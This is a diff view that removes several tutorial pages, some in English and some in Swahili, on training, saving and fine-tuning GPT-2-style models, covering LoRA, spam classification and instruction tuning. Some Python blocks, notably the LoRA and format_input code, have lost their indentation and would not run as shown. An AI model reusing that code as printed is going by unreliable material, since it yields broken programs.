		||||
            optimizer.step() # Update model weights using loss gradients
 | 
			
		||||
            tokens_seen += input_batch.numel()
 | 
			
		||||
            global_step += 1
 | 
			
		||||
 | 
			
		||||
            # Optional evaluation step
 | 
			
		||||
            if global_step % eval_freq == 0:
 | 
			
		||||
                train_loss, val_loss = evaluate_model(
 | 
			
		||||
                    model, train_loader, val_loader, device, eval_iter)
 | 
			
		||||
                train_losses.append(train_loss)
 | 
			
		||||
                val_losses.append(val_loss)
 | 
			
		||||
                track_tokens_seen.append(tokens_seen)
 | 
			
		||||
                print(f"Ep {epoch+1} (Step {global_step:06d}): "
 | 
			
		||||
                      f"Train loss {train_loss:.3f}, Val loss {val_loss:.3f}")
 | 
			
		||||
 | 
			
		||||
        # Print a sample text after each epoch
 | 
			
		||||
        generate_and_print_sample(
 | 
			
		||||
            model, tokenizer, device, start_context
 | 
			
		||||
        )
 | 
			
		||||
 | 
			
		||||
    return train_losses, val_losses, track_tokens_seen
 | 
			
		||||
 | 
			
		||||
 | 
			
		||||
def evaluate_model(model, train_loader, val_loader, device, eval_iter):
 | 
			
		||||
    model.eval() # Set in eval mode to avoid dropout
 | 
			
		||||
    with torch.no_grad():
 | 
			
		||||
        train_loss = calc_loss_loader(train_loader, model, device, num_batches=eval_iter)
 | 
			
		||||
        val_loss = calc_loss_loader(val_loader, model, device, num_batches=eval_iter)
 | 
			
		||||
    model.train() # Back to training model applying all the configurations
 | 
			
		||||
    return train_loss, val_loss
 | 
			
		||||
 | 
			
		||||
 | 
			
		||||
def generate_and_print_sample(model, tokenizer, device, start_context):
 | 
			
		||||
    model.eval() # Set in eval mode to avoid dropout
 | 
			
		||||
    context_size = model.pos_emb.weight.shape[0]
 | 
			
		||||
    encoded = text_to_token_ids(start_context, tokenizer).to(device)
 | 
			
		||||
    with torch.no_grad():
 | 
			
		||||
        token_ids = generate_text(
 | 
			
		||||
            model=model, idx=encoded,
 | 
			
		||||
            max_new_tokens=50, context_size=context_size
 | 
			
		||||
        )
 | 
			
		||||
    decoded_text = token_ids_to_text(token_ids, tokenizer)
 | 
			
		||||
    print(decoded_text.replace("\n", " "))  # Compact print format
 | 
			
		||||
    model.train() # Back to training model applying all the configurations
 | 
			
		||||
```
 | 
			
		||||
 | 
			
		||||
> [!NOTE]
 | 
			
		||||
> To improve the learning rate there are a couple relevant techniques called **linear warmup** and **cosine decay.**
 | 
			
		||||
>
 | 
			
		||||
> **Linear warmup** consist on define an initial learning rate and a maximum one and consistently update it after each epoch. This is because starting the training with smaller weight updates decreases the risk of the model encountering large, destabilizing updates during its training phase.\
 | 
			
		||||
> **Cosine decay** is a technique that **gradually reduces the learning rate** following a half-cosine curve **after the warmup** phase, slowing weight updates to **minimize the risk of overshooting** the loss minima and ensure training stability in later phases.
 | 
			
		||||
>
 | 
			
		||||
> _Note that these improvements aren't included in the previous code._
 | 
			
		||||
 | 
			
		||||
### Start training
 | 
			
		||||
 | 
			
		||||
```python
 | 
			
		||||
import time
 | 
			
		||||
start_time = time.time()
 | 
			
		||||
 | 
			
		||||
torch.manual_seed(123)
 | 
			
		||||
model = GPTModel(GPT_CONFIG_124M)
 | 
			
		||||
model.to(device)
 | 
			
		||||
optimizer = torch.optim.AdamW(model.parameters(), lr=0.0004, weight_decay=0.1)
 | 
			
		||||
 | 
			
		||||
num_epochs = 10
 | 
			
		||||
train_losses, val_losses, tokens_seen = train_model_simple(
 | 
			
		||||
    model, train_loader, val_loader, optimizer, device,
 | 
			
		||||
    num_epochs=num_epochs, eval_freq=5, eval_iter=5,
 | 
			
		||||
    start_context="Every effort moves you", tokenizer=tokenizer
 | 
			
		||||
)
 | 
			
		||||
 | 
			
		||||
end_time = time.time()
 | 
			
		||||
execution_time_minutes = (end_time - start_time) / 60
 | 
			
		||||
print(f"Training completed in {execution_time_minutes:.2f} minutes.")
 | 
			
		||||
```
 | 
			
		||||
 | 
			
		||||
### Print training evolution
 | 
			
		||||
 | 
			
		||||
With the following function it's possible to print the evolution of the model while it was being trained.
 | 
			
		||||
 | 
			
		||||
```python
 | 
			
		||||
import matplotlib.pyplot as plt
 | 
			
		||||
from matplotlib.ticker import MaxNLocator
 | 
			
		||||
import math
 | 
			
		||||
def plot_losses(epochs_seen, tokens_seen, train_losses, val_losses):
 | 
			
		||||
    fig, ax1 = plt.subplots(figsize=(5, 3))
 | 
			
		||||
    ax1.plot(epochs_seen, train_losses, label="Training loss")
 | 
			
		||||
    ax1.plot(
 | 
			
		||||
        epochs_seen, val_losses, linestyle="-.", label="Validation loss"
 | 
			
		||||
    )
 | 
			
		||||
    ax1.set_xlabel("Epochs")
 | 
			
		||||
    ax1.set_ylabel("Loss")
 | 
			
		||||
    ax1.legend(loc="upper right")
 | 
			
		||||
    ax1.xaxis.set_major_locator(MaxNLocator(integer=True))
 | 
			
		||||
    ax2 = ax1.twiny()
 | 
			
		||||
    ax2.plot(tokens_seen, train_losses, alpha=0)
 | 
			
		||||
    ax2.set_xlabel("Tokens seen")
 | 
			
		||||
    fig.tight_layout()
 | 
			
		||||
    plt.show()
 | 
			
		||||
 | 
			
		||||
    # Compute perplexity from the loss values
 | 
			
		||||
    train_ppls = [math.exp(loss) for loss in train_losses]
 | 
			
		||||
    val_ppls = [math.exp(loss) for loss in val_losses]
 | 
			
		||||
    # Plot perplexity over tokens seen
 | 
			
		||||
    plt.figure()
 | 
			
		||||
    plt.plot(tokens_seen, train_ppls, label='Training Perplexity')
 | 
			
		||||
    plt.plot(tokens_seen, val_ppls, label='Validation Perplexity')
 | 
			
		||||
    plt.xlabel('Tokens Seen')
 | 
			
		||||
    plt.ylabel('Perplexity')
 | 
			
		||||
    plt.title('Perplexity over Training')
 | 
			
		||||
    plt.legend()
 | 
			
		||||
    plt.show()
 | 
			
		||||
 | 
			
		||||
epochs_tensor = torch.linspace(0, num_epochs, len(train_losses))
 | 
			
		||||
plot_losses(epochs_tensor, tokens_seen, train_losses, val_losses)
 | 
			
		||||
```
 | 
			
		||||
 | 
			
		||||
### Save the model
 | 
			
		||||
 | 
			
		||||
It's possible to save the model + optimizer if you want to continue training later:
 | 
			
		||||
 | 
			
		||||
```python
 | 
			
		||||
# Save the model and the optimizer for later training
 | 
			
		||||
torch.save({
 | 
			
		||||
    "model_state_dict": model.state_dict(),
 | 
			
		||||
    "optimizer_state_dict": optimizer.state_dict(),
 | 
			
		||||
    },
 | 
			
		||||
"/tmp/model_and_optimizer.pth"
 | 
			
		||||
)
 | 
			
		||||
# Note that this model with the optimizer occupied close to 2GB
 | 
			
		||||
 | 
			
		||||
# Restore model and optimizer for training
 | 
			
		||||
checkpoint = torch.load("/tmp/model_and_optimizer.pth", map_location=device)
 | 
			
		||||
 | 
			
		||||
model = GPTModel(GPT_CONFIG_124M)
 | 
			
		||||
model.load_state_dict(checkpoint["model_state_dict"])
 | 
			
		||||
optimizer = torch.optim.AdamW(model.parameters(), lr=5e-4, weight_decay=0.1)
 | 
			
		||||
optimizer.load_state_dict(checkpoint["optimizer_state_dict"])
 | 
			
		||||
model.train(); # Put in training mode
 | 
			
		||||
```
 | 
			
		||||
 | 
			
		||||
Or just the model if you are planing just on using it:
 | 
			
		||||
 | 
			
		||||
```python
 | 
			
		||||
# Save the model
 | 
			
		||||
torch.save(model.state_dict(), "model.pth")
 | 
			
		||||
 | 
			
		||||
# Load it
 | 
			
		||||
model = GPTModel(GPT_CONFIG_124M)
 | 
			
		||||
 | 
			
		||||
model.load_state_dict(torch.load("model.pth", map_location=device))
 | 
			
		||||
 | 
			
		||||
model.eval() # Put in eval mode
 | 
			
		||||
```
 | 
			
		||||
 | 
			
		||||
## Loading GPT2 weights
 | 
			
		||||
 | 
			
		||||
There 2 quick scripts to load the GPT2 weights locally. For both you can clone the repository [https://github.com/rasbt/LLMs-from-scratch](https://github.com/rasbt/LLMs-from-scratch) locally, then:
 | 
			
		||||
 | 
			
		||||
- The script [https://github.com/rasbt/LLMs-from-scratch/blob/main/ch05/01_main-chapter-code/gpt_generate.py](https://github.com/rasbt/LLMs-from-scratch/blob/main/ch05/01_main-chapter-code/gpt_generate.py) will download all the weights and transform the formats from OpenAI to the ones expected by our LLM. The script is also prepared with the needed configuration and with the prompt: "Every effort moves you"
 | 
			
		||||
- The script [https://github.com/rasbt/LLMs-from-scratch/blob/main/ch05/02_alternative_weight_loading/weight-loading-hf-transformers.ipynb](https://github.com/rasbt/LLMs-from-scratch/blob/main/ch05/02_alternative_weight_loading/weight-loading-hf-transformers.ipynb) allows you to load any of the GPT2 weights locally (just change the `CHOOSE_MODEL` var) and predict text from some prompts.
 | 
			
		||||
 | 
			
		||||
## References
 | 
			
		||||
 | 
			
		||||
- [https://www.manning.com/books/build-a-large-language-model-from-scratch](https://www.manning.com/books/build-a-large-language-model-from-scratch)
 | 
			
		||||
 | 
			
		||||
@ -1,61 +0,0 @@
 | 
			
		||||
# 7.0. LoRA Maboresho katika uboreshaji
 | 
			
		||||
 | 
			
		||||
## Maboresho ya LoRA
 | 
			
		||||
 | 
			
		||||
> [!TIP]
 | 
			
		||||
> Matumizi ya **LoRA hupunguza sana hesabu** inayohitajika ili **kuboresha** mifano iliyofundishwa tayari.
 | 
			
		||||
 | 
			
		||||
LoRA inafanya iwezekane kuboresha **mifano mikubwa** kwa ufanisi kwa kubadilisha tu **sehemu ndogo** ya mfano. Inapunguza idadi ya vigezo unavyohitaji kufundisha, ikihifadhi **kumbukumbu** na **rasilimali za kompyuta**. Hii ni kwa sababu:
 | 
			
		||||
 | 
			
		||||
1. **Inapunguza Idadi ya Vigezo Vinavyoweza Kufundishwa**: Badala ya kuboresha matrix nzima ya uzito katika mfano, LoRA **inahesabu** matrix ya uzito kuwa matrices mbili ndogo (zinazoitwa **A** na **B**). Hii inafanya mafunzo kuwa **ya haraka** na inahitaji **kumbukumbu kidogo** kwa sababu vigezo vichache vinahitaji kuboreshwa.
 | 
			
		||||
 | 
			
		||||
1. Hii ni kwa sababu badala ya kuhesabu sasisho kamili la uzito wa safu (matrix), inakadiria kuwa ni bidhaa ya matrices 2 ndogo ikipunguza sasisho la kuhesabu:\
 | 
			
		||||
 | 
			
		||||
<figure><img src="../../images/image (9) (1).png" alt=""><figcaption></figcaption></figure>
 | 
			
		||||
 | 
			
		||||
2. **Inahifadhi Uzito wa Mfano wa Asili Bila Kubadilika**: LoRA inakuwezesha kuhifadhi uzito wa mfano wa asili kuwa sawa, na inasasisha tu **matrices ndogo mpya** (A na B). Hii ni muhimu kwa sababu inamaanisha kuwa maarifa ya asili ya mfano yanahifadhiwa, na unabadilisha tu kile kinachohitajika.
 | 
			
		||||
3. **Uboreshaji wa Kazi Maalum kwa Ufanisi**: Unapotaka kuadaptisha mfano kwa **kazi mpya**, unaweza tu kufundisha **matrices ndogo za LoRA** (A na B) huku ukiacha sehemu nyingine ya mfano kama ilivyo. Hii ni **ya ufanisi zaidi** kuliko kufundisha upya mfano mzima.
 | 
			
		||||
4. **Ufanisi wa Hifadhi**: Baada ya kuboresha, badala ya kuhifadhi **mfano mpya mzima** kwa kila kazi, unahitaji tu kuhifadhi **matrices za LoRA**, ambazo ni ndogo sana ikilinganishwa na mfano mzima. Hii inafanya iwe rahisi kuadaptisha mfano kwa kazi nyingi bila kutumia hifadhi nyingi.
 | 
			
		||||
 | 
			
		||||
Ili kutekeleza LoraLayers badala ya zile za Linear wakati wa uboreshaji, msimbo huu unapendekezwa hapa [https://github.com/rasbt/LLMs-from-scratch/blob/main/appendix-E/01_main-chapter-code/appendix-E.ipynb](https://github.com/rasbt/LLMs-from-scratch/blob/main/appendix-E/01_main-chapter-code/appendix-E.ipynb):
 | 
			
		||||
```python
 | 
			
		||||
import math
 | 
			
		||||
 | 
			
		||||
# Create the LoRA layer with the 2 matrices and the alpha
 | 
			
		||||
class LoRALayer(torch.nn.Module):
 | 
			
		||||
def __init__(self, in_dim, out_dim, rank, alpha):
 | 
			
		||||
super().__init__()
 | 
			
		||||
self.A = torch.nn.Parameter(torch.empty(in_dim, rank))
 | 
			
		||||
torch.nn.init.kaiming_uniform_(self.A, a=math.sqrt(5))  # similar to standard weight initialization
 | 
			
		||||
self.B = torch.nn.Parameter(torch.zeros(rank, out_dim))
 | 
			
		||||
self.alpha = alpha
 | 
			
		||||
 | 
			
		||||
def forward(self, x):
 | 
			
		||||
x = self.alpha * (x @ self.A @ self.B)
 | 
			
		||||
return x
 | 
			
		||||
 | 
			
		||||
# Combine it with the linear layer
 | 
			
		||||
class LinearWithLoRA(torch.nn.Module):
 | 
			
		||||
def __init__(self, linear, rank, alpha):
 | 
			
		||||
super().__init__()
 | 
			
		||||
self.linear = linear
 | 
			
		||||
self.lora = LoRALayer(
 | 
			
		||||
linear.in_features, linear.out_features, rank, alpha
 | 
			
		||||
)
 | 
			
		||||
 | 
			
		||||
def forward(self, x):
 | 
			
		||||
return self.linear(x) + self.lora(x)
 | 
			
		||||
 | 
			
		||||
# Replace linear layers with LoRA ones
 | 
			
		||||
def replace_linear_with_lora(model, rank, alpha):
 | 
			
		||||
for name, module in model.named_children():
 | 
			
		||||
if isinstance(module, torch.nn.Linear):
 | 
			
		||||
# Replace the Linear layer with LinearWithLoRA
 | 
			
		||||
setattr(model, name, LinearWithLoRA(module, rank, alpha))
 | 
			
		||||
else:
 | 
			
		||||
# Recursively apply the same function to child modules
 | 
			
		||||
replace_linear_with_lora(module, rank, alpha)
 | 
			
		||||
```
 | 
			
		||||
## Marejeo
 | 
			
		||||
 | 
			
		||||
- [https://www.manning.com/books/build-a-large-language-model-from-scratch](https://www.manning.com/books/build-a-large-language-model-from-scratch)
 | 
			
		||||
@ -1,117 +0,0 @@
 | 
			
		||||
# 7.1. Fine-Tuning for Classification
 | 
			
		||||
 | 
			
		||||
## What is
 | 
			
		||||
 | 
			
		||||
Fine-tuning is the process of taking a **pre-trained model** that has learned **general language patterns** from vast amounts of data and **adapting** it to perform a **specific task** or to understand domain-specific language. This is achieved by continuing the training of the model on a smaller, task-specific dataset, allowing it to adjust its parameters to better suit the nuances of the new data while leveraging the broad knowledge it has already acquired. Fine-tuning enables the model to deliver more accurate and relevant results in specialized applications without the need to train a new model from scratch.
 | 
			
		||||
 | 
			
		||||
> [!NOTE]
 | 
			
		||||
> As pre-training a LLM that "understands" the text is pretty expensive it's usually easier and cheaper to to fine-tune open source pre-trained models to perform a specific task we want it to perform.
 | 
			
		||||
 | 
			
		||||
> [!TIP]
 | 
			
		||||
> The goal of this section is to show how to fine-tune an already pre-trained model so instead of generating new text the LLM will select give the **probabilities of the given text being categorized in each of the given categories** (like if a text is spam or not).
 | 
			
		||||
 | 
			
		||||
## Preparing the data set
 | 
			
		||||
 | 
			
		||||
### Data set size
 | 
			
		||||
 | 
			
		||||
Of course, in order to fine-tune a model you need some structured data to use to specialise your LLM. In the example proposed in [https://github.com/rasbt/LLMs-from-scratch/blob/main/ch06/01_main-chapter-code/ch06.ipynb](https://github.com/rasbt/LLMs-from-scratch/blob/main/ch06/01_main-chapter-code/ch06.ipynb), GPT2 is fine tuned to detect if an email is spam or not using the data from [https://archive.ics.uci.edu/static/public/228/sms+spam+collection.zip](https://archive.ics.uci.edu/static/public/228/sms+spam+collection.zip)_._
 | 
			
		||||
 | 
			
		||||
This data set contains much more examples of "not spam" that of "spam", therefore the book suggest to **only use as many examples of "not spam" as of "spam"** (therefore, removing from the training data all the extra examples). In this case, this was 747 examples of each.
 | 
			
		||||
 | 
			
		||||
Then, **70%** of the data set is used for **training**, **10%** for **validation** and **20%** for **testing**.
 | 
			
		||||
 | 
			
		||||
- The **validation set** is used during the training phase to fine-tune the model's **hyperparameters** and make decisions about model architecture, effectively helping to prevent overfitting by providing feedback on how the model performs on unseen data. It allows for iterative improvements without biasing the final evaluation.
 | 
			
		||||
  - This means that although the data included in this data set is not used for the training directly, it's used to tune the best **hyperparameters**, so this set cannot be used to evaluate the performance of the model like the testing one.
 | 
			
		||||
- In contrast, the **test set** is used **only after** the model has been fully trained and all adjustments are complete; it provides an unbiased assessment of the model's ability to generalize to new, unseen data. This final evaluation on the test set gives a realistic indication of how the model is expected to perform in real-world applications.
 | 
			
		||||
 | 
			
		||||
### Entries length
 | 
			
		||||
 | 
			
		||||
As the training example expects entries (emails text in this case) of the same length, it was decided to make every entry as large as the largest one by adding the ids of `<|endoftext|>` as padding.
 | 
			
		||||
 | 
			
		||||
### Initialize the model
 | 
			
		||||
 | 
			
		||||
Using the open-source pre-trained weights initialize the model to train. We have already done this before and follow the instructions of [https://github.com/rasbt/LLMs-from-scratch/blob/main/ch06/01_main-chapter-code/ch06.ipynb](https://github.com/rasbt/LLMs-from-scratch/blob/main/ch06/01_main-chapter-code/ch06.ipynb) you can easily do it.
 | 
			
		||||
 | 
			
		||||
## Classification head
 | 
			
		||||
 | 
			
		||||
In this specific example (predicting if a text is spam or not), we are not interested in fine tune according to the complete vocabulary of GPT2 but we only want the new model to say if the email is spam (1) or not (0). Therefore, we are going to **modify the final layer that** gives the probabilities per token of the vocabulary for one that only gives the probabilities of being spam or not (so like a vocabulary of 2 words).
 | 
			
		||||
 | 
			
		||||
```python
 | 
			
		||||
# This code modified the final layer with a Linear one with 2 outs
 | 
			
		||||
num_classes = 2
 | 
			
		||||
model.out_head = torch.nn.Linear(
 | 
			
		||||
 | 
			
		||||
in_features=BASE_CONFIG["emb_dim"],
 | 
			
		||||
 | 
			
		||||
out_features=num_classes
 | 
			
		||||
)
 | 
			
		||||
```
 | 
			
		||||
 | 
			
		||||
## Parameters to tune
 | 
			
		||||
 | 
			
		||||
In order to fine tune fast it's easier to not fine tune all the parameters but only some final ones. This is because it's known that the lower layers generally capture basic language structures and semantics applicable. So, just **fine tuning the last layers is usually enough and faster**.
 | 
			
		||||
 | 
			
		||||
```python
 | 
			
		||||
# This code makes all the parameters of the model unrtainable
 | 
			
		||||
for param in model.parameters():
 | 
			
		||||
    param.requires_grad = False
 | 
			
		||||
 | 
			
		||||
# Allow to fine tune the last layer in the transformer block
 | 
			
		||||
for param in model.trf_blocks[-1].parameters():
 | 
			
		||||
    param.requires_grad = True
 | 
			
		||||
 | 
			
		||||
# Allow to fine tune the final layer norm
 | 
			
		||||
for param in model.final_norm.parameters():
 | 
			
		||||
 | 
			
		||||
param.requires_grad = True
 | 
			
		||||
```
 | 
			
		||||
 | 
			
		||||
## Entries to use for training
 | 
			
		||||
 | 
			
		||||
In previos sections the LLM was trained reducing the loss of every predicted token, even though almost all the predicted tokens were in the input sentence (only 1 at the end was really predicted) in order for the model to understand better the language.
 | 
			
		||||
 | 
			
		||||
In this case we only care on the model being able to predict if the model is spam or not, so we only care about the last token predicted. Therefore, it's needed to modify out previous training loss functions to only take into account that token.
 | 
			
		||||
 | 
			
		||||
This is implemented in [https://github.com/rasbt/LLMs-from-scratch/blob/main/ch06/01_main-chapter-code/ch06.ipynb](https://github.com/rasbt/LLMs-from-scratch/blob/main/ch06/01_main-chapter-code/ch06.ipynb) as:
 | 
			
		||||
 | 
			
		||||
```python
 | 
			
		||||
def calc_accuracy_loader(data_loader, model, device, num_batches=None):
 | 
			
		||||
    model.eval()
 | 
			
		||||
    correct_predictions, num_examples = 0, 0
 | 
			
		||||
 | 
			
		||||
    if num_batches is None:
 | 
			
		||||
        num_batches = len(data_loader)
 | 
			
		||||
    else:
 | 
			
		||||
        num_batches = min(num_batches, len(data_loader))
 | 
			
		||||
    for i, (input_batch, target_batch) in enumerate(data_loader):
 | 
			
		||||
        if i < num_batches:
 | 
			
		||||
            input_batch, target_batch = input_batch.to(device), target_batch.to(device)
 | 
			
		||||
 | 
			
		||||
            with torch.no_grad():
 | 
			
		||||
                logits = model(input_batch)[:, -1, :]  # Logits of last output token
 | 
			
		||||
            predicted_labels = torch.argmax(logits, dim=-1)
 | 
			
		||||
 | 
			
		||||
            num_examples += predicted_labels.shape[0]
 | 
			
		||||
            correct_predictions += (predicted_labels == target_batch).sum().item()
 | 
			
		||||
        else:
 | 
			
		||||
            break
 | 
			
		||||
    return correct_predictions / num_examples
 | 
			
		||||
 | 
			
		||||
 | 
			
		||||
def calc_loss_batch(input_batch, target_batch, model, device):
 | 
			
		||||
    input_batch, target_batch = input_batch.to(device), target_batch.to(device)
 | 
			
		||||
    logits = model(input_batch)[:, -1, :]  # Logits of last output token
 | 
			
		||||
    loss = torch.nn.functional.cross_entropy(logits, target_batch)
 | 
			
		||||
    return loss
 | 
			
		||||
```
 | 
			
		||||
 | 
			
		||||
Note how for each batch we are only interested in the **logits of the last token predicted**.
 | 
			
		||||
 | 
			
		||||
## Complete GPT2 fine-tune classification code
 | 
			
		||||
 | 
			
		||||
You can find all the code to fine-tune GPT2 to be a spam classifier in [https://github.com/rasbt/LLMs-from-scratch/blob/main/ch06/01_main-chapter-code/load-finetuned-model.ipynb](https://github.com/rasbt/LLMs-from-scratch/blob/main/ch06/01_main-chapter-code/load-finetuned-model.ipynb)
 | 
			
		||||
 | 
			
		||||
## References
 | 
			
		||||
 | 
			
		||||
- [https://www.manning.com/books/build-a-large-language-model-from-scratch](https://www.manning.com/books/build-a-large-language-model-from-scratch)
 | 
			
		||||
 | 
			
		||||
@ -1,100 +0,0 @@
 | 
			
		||||
# 7.2. Kurekebisha ili kufuata maelekezo
 | 
			
		||||
 | 
			
		||||
> [!TIP]
 | 
			
		||||
> Lengo la sehemu hii ni kuonyesha jinsi ya **kurekebisha mfano ulio tayari tayari kufuata maelekezo** badala ya kuzalisha tu maandiko, kwa mfano, kujibu kazi kama roboti ya mazungumzo.
 | 
			
		||||
 | 
			
		||||
## Dataset
 | 
			
		||||
 | 
			
		||||
Ili kurekebisha LLM kufuata maelekezo, inahitajika kuwa na dataset yenye maelekezo na majibu ili kurekebisha LLM. Kuna mifano tofauti ya kufundisha LLM kufuata maelekezo, kwa mfano:
 | 
			
		||||
 | 
			
		||||
- Mfano wa mtindo wa ombi la Apply Alpaca:
 | 
			
		||||
```csharp
 | 
			
		||||
Below is an instruction that describes a task. Write a response that appropriately completes the request.
 | 
			
		||||
 | 
			
		||||
### Instruction:
 | 
			
		||||
Calculate the area of a circle with a radius of 5 units.
 | 
			
		||||
 | 
			
		||||
### Response:
 | 
			
		||||
The area of a circle is calculated using the formula \( A = \pi r^2 \). Plugging in the radius of 5 units:
 | 
			
		||||
 | 
			
		||||
\( A = \pi (5)^2 = \pi \times 25 = 25\pi \) square units.
 | 
			
		||||
```
 | 
			
		||||
- Mfano wa Mtindo wa Phi-3 Prompt:
 | 
			
		||||
```vbnet
 | 
			
		||||
<|User|>
 | 
			
		||||
Can you explain what gravity is in simple terms?
 | 
			
		||||
 | 
			
		||||
<|Assistant|>
 | 
			
		||||
Absolutely! Gravity is a force that pulls objects toward each other.
 | 
			
		||||
```
 | 
			
		||||
Kufundisha LLM na seti hizi za data badala ya maandiko safi husaidia LLM kuelewa kwamba inahitaji kutoa majibu maalum kwa maswali inayopewa.
 | 
			
		||||
 | 
			
		||||
Hivyo, moja ya mambo ya kwanza ya kufanya na seti ya data inayojumuisha maombi na majibu ni kuunda mfano wa tarehe hiyo katika muundo wa ombi unaotakiwa, kama:
 | 
			
		||||
```python
 | 
			
		||||
# Code from https://github.com/rasbt/LLMs-from-scratch/blob/main/ch07/01_main-chapter-code/ch07.ipynb
 | 
			
		||||
def format_input(entry):
 | 
			
		||||
instruction_text = (
 | 
			
		||||
f"Below is an instruction that describes a task. "
 | 
			
		||||
f"Write a response that appropriately completes the request."
 | 
			
		||||
f"\n\n### Instruction:\n{entry['instruction']}"
 | 
			
		||||
)
 | 
			
		||||
 | 
			
		||||
input_text = f"\n\n### Input:\n{entry['input']}" if entry["input"] else ""
 | 
			
		||||
 | 
			
		||||
return instruction_text + input_text
 | 
			
		||||
 | 
			
		||||
model_input = format_input(data[50])
 | 
			
		||||
 | 
			
		||||
desired_response = f"\n\n### Response:\n{data[50]['output']}"
 | 
			
		||||
 | 
			
		||||
print(model_input + desired_response)
 | 
			
		||||
```
 | 
			
		||||
Kisha, kama kawaida, inahitajika kutenganisha dataset katika seti za mafunzo, uthibitisho na upimaji.
 | 
			
		||||
 | 
			
		||||
## Batching & Data Loaders
 | 
			
		||||
 | 
			
		||||
Kisha, inahitajika kubatch kila ingizo na matokeo yanayotarajiwa kwa mafunzo. Kwa hili, inahitajika:
 | 
			
		||||
 | 
			
		||||
- Tokenize maandiko
 | 
			
		||||
- Pad sampuli zote hadi urefu sawa (kawaida urefu utakuwa mkubwa kama urefu wa muktadha ulitumika kabla ya mafunzo ya LLM)
 | 
			
		||||
- Unda token zinazotarajiwa kwa kuhamasisha 1 ingizo katika kazi maalum ya collate
 | 
			
		||||
- Badilisha baadhi ya token za padding na -100 ili kuziondoa kwenye hasara ya mafunzo: Baada ya token ya kwanza `endoftext`, badilisha token zote nyingine za `endoftext` kwa -100 (kwa sababu kutumia `cross_entropy(...,ignore_index=-100)` inamaanisha kwamba itapuuzilia mbali malengo yenye -100)
 | 
			
		||||
- \[Hiari\] Ficha kwa kutumia -100 pia token zote zinazohusiana na swali ili LLM ijifunze tu jinsi ya kuzalisha jibu. Katika mtindo wa Apply Alpaca hii itamaanisha kuficha kila kitu hadi `### Response:`
 | 
			
		||||
 | 
			
		||||
Kwa hili lililoundwa, ni wakati wa kuunda data loaders kwa kila dataset (mafunzo, uthibitisho na upimaji).
 | 
			
		||||
 | 
			
		||||
## Load pre-trained LLM & Fine tune & Loss Checking
 | 
			
		||||
 | 
			
		||||
Inahitajika kupakia LLM iliyofundishwa awali ili kuifanyia marekebisho. Hii tayari ilijadiliwa katika kurasa nyingine. Kisha, inawezekana kutumia kazi ya mafunzo iliyotumika awali ili kuifanyia marekebisho LLM.
 | 
			
		||||
 | 
			
		||||
Wakati wa mafunzo pia inawezekana kuona jinsi hasara ya mafunzo na hasara ya uthibitisho inavyobadilika wakati wa nyakati ili kuona kama hasara inapata kupungua na kama overfitting inatokea.\
 | 
			
		||||
Kumbuka kwamba overfitting inatokea wakati hasara ya mafunzo inapata kupungua lakini hasara ya uthibitisho haipungui au hata inaongezeka. Ili kuepuka hili, jambo rahisi la kufanya ni kusitisha mafunzo katika kipindi ambacho tabia hii inaanza.
 | 
			
		||||
 | 
			
		||||
## Response Quality
 | 
			
		||||
 | 
			
		||||
Kwa kuwa hii si marekebisho ya uainishaji ambapo inawezekana kuamini zaidi mabadiliko ya hasara, pia ni muhimu kuangalia ubora wa majibu katika seti ya upimaji. Kwa hivyo, inapendekezwa kukusanya majibu yaliyoundwa kutoka kwa seti zote za upimaji na **kuangalia ubora wao kwa mikono** ili kuona kama kuna majibu mabaya (kumbuka kwamba inawezekana kwa LLM kuunda kwa usahihi muundo na sintaksia ya sentensi ya jibu lakini kutoa jibu kabisa lisilo sahihi. Mabadiliko ya hasara hayatadhihirisha tabia hii).\
 | 
			
		||||
Kumbuka kwamba pia inawezekana kufanya ukaguzi huu kwa kupitisha majibu yaliyoundwa na majibu yanayotarajiwa kwa **LLMs nyingine na kuwauliza wathmini majibu**.
 | 
			
		||||
 | 
			
		||||
Jaribio lingine la kufanya ili kuthibitisha ubora wa majibu:
 | 
			
		||||
 | 
			
		||||
1. **Measuring Massive Multitask Language Understanding (**[**MMLU**](https://arxiv.org/abs/2009.03300)**):** MMLU inakadiria maarifa ya mfano na uwezo wa kutatua matatizo katika masomo 57, ikiwa ni pamoja na humanities, sayansi, na zaidi. Inatumia maswali ya uchaguzi mwingi kutathmini uelewa katika ngazi mbalimbali za ugumu, kutoka msingi hadi kitaaluma ya juu.
 | 
			
		||||
2. [**LMSYS Chatbot Arena**](https://arena.lmsys.org): Jukwaa hili linawawezesha watumiaji kulinganisha majibu kutoka kwa chatbots tofauti kwa upande mmoja. Watumiaji wanaingiza kichocheo, na chatbots nyingi zinazalisha majibu ambayo yanaweza kulinganishwa moja kwa moja.
 | 
			
		||||
3. [**AlpacaEval**](https://github.com/tatsu-lab/alpaca_eval)**:** AlpacaEval ni mfumo wa tathmini wa kiotomatiki ambapo LLM ya juu kama GPT-4 inakadiria majibu ya mifano mingine kwa kichocheo mbalimbali.
 | 
			
		||||
4. **General Language Understanding Evaluation (**[**GLUE**](https://gluebenchmark.com/)**):** GLUE ni mkusanyiko wa kazi tisa za uelewa wa lugha asilia, ikiwa ni pamoja na uchambuzi wa hisia, uhusiano wa maandiko, na kujibu maswali.
 | 
			
		||||
5. [**SuperGLUE**](https://super.gluebenchmark.com/)**:** Kujenga juu ya GLUE, SuperGLUE inajumuisha kazi ngumu zaidi zilizoundwa kuwa ngumu kwa mifano ya sasa.
 | 
			
		||||
6. **Beyond the Imitation Game Benchmark (**[**BIG-bench**](https://github.com/google/BIG-bench)**):** BIG-bench ni kipimo kikubwa chenye kazi zaidi ya 200 zinazotest uwezo wa mfano katika maeneo kama mantiki, tafsiri, na kujibu maswali.
 | 
			
		||||
7. **Holistic Evaluation of Language Models (**[**HELM**](https://crfm.stanford.edu/helm/lite/latest/)**):** HELM inatoa tathmini kamili katika metriki mbalimbali kama usahihi, uimara, na haki.
 | 
			
		||||
8. [**OpenAI Evals**](https://github.com/openai/evals)**:** Mfumo wa tathmini wa wazi wa OpenAI unaowezesha kupima mifano ya AI kwenye kazi za kawaida na za kiwango.
 | 
			
		||||
9. [**HumanEval**](https://github.com/openai/human-eval)**:** Mkusanyiko wa matatizo ya programu yanayotumika kutathmini uwezo wa kizazi cha msimbo wa mifano ya lugha.
 | 
			
		||||
10. **Stanford Question Answering Dataset (**[**SQuAD**](https://rajpurkar.github.io/SQuAD-explorer/)**):** SQuAD inajumuisha maswali kuhusu makala za Wikipedia, ambapo mifano inapaswa kuelewa maandiko ili kujibu kwa usahihi.
 | 
			
		||||
